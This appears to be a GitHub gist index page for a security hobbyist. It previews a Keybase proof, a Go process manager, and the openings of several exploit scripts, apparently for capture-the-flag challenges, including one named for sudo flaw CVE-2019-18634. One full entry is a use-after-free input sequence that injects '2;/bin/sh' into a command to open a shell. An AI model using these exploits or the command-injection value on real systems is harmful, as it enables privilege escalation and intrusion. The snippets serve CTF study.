I hereby claim:
- I am iamalsaher on github.
- I am iamalsaher (https://keybase.io/iamalsaher) on keybase.
- I have a public key ASC2ainpBPngd1KAmYAXbYSD8JF_ZNVOY0Kx2kcMfrEIbAo
To claim this, I am signing this object:
Swapnil iamalsaher
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| //This is a modified version of natefinch's npipe where I exposed the handle in PipeConn struct so that I can use it as needed | |
| "sepipe/npipe" | |
| "bytes" | |
| "fmt" | |
| "io" | |
| "os" | |
| "sync" |
iamalsaher
/ manager.go
Created
April 9, 2021 06:31
This is an attempt to manage running processes, grabbing live output and sending input using golang
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package manager | |
| import ( | |
| "bytes" | |
| "errors" | |
| "io" | |
| "os/exec" | |
| "sync" | |
| "time" | |
| ) |
iamalsaher
/ CVE-2019-18634.py
Created
February 8, 2020 01:41
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| import sys,os | |
| from pwn import * | |
| TARGET=os.path.realpath("/usr/bin/sudo") | |
| def setFlags(flags): | |
| tgetpassFlags = { | |
| "TGP_NOECHO":0x00, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from Crypto.Util.number import * | |
| from gmpy2 import * | |
| from Crypto.PublicKey.RSA import importKey | |
| key = importKey(open("PublicKey.pem").read()) | |
| print (key.n) | |
| print (key.e) | |
| print long_to_bytes(195859165006622592278228905243976739313345311002376698392014723869927931336851714245606129350201186625593292413) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| import sys,os | |
| from pwn import * | |
| HOST="52.9.166.247" | |
| PORT=1337 | |
| def exploit(r): |
iamalsaher
/ xploit_manipulate.py
Created
September 30, 2019 09:41
Increase atoi to switch to system, call /bin//sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| import sys,os | |
| from pwn import * | |
| HOST="13.56.97.226" | |
| PORT=1337 | |
| TARGET=os.path.realpath("manipulate") | |
| LIBRARY="" |
iamalsaher
/ xploit_ivierd.py
Created
September 30, 2019 09:36
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| import sys,os | |
| from pwn import * | |
| HOST="13.57.200.124" | |
| PORT=1337 | |
| def exploit(r): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 2 #set the month | |
| 12 #set month as december | |
| 1 #set year | |
| 2 #set year as 2, allocate a chunk | |
| 5 #free the chunk, this will free the year chunk to be used anywhere | |
| 4 #set an admin, this will allocate the year chunk for itself, and we can put arbitrary data for year chunk | |
| 2;/bin/sh #set this as an admin, this will get stored in the original year chunk, effectively being reused after being called | |
| 3 #show calender and exec system (cal 12 2;/bin/sh) effectively popping shell |
iamalsaher
/ rop.py
Created
December 7, 2018 13:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python2 | |
| from pwn import * | |
| import sys | |
| LOCAL = True | |
| HOST = "13.233.178.121" | |
| PORT = 1337 | |
| BINARY = "./rop" |
iamalsaher
/ keybase.md
Created
May 4, 2018 22:45
NewerOlder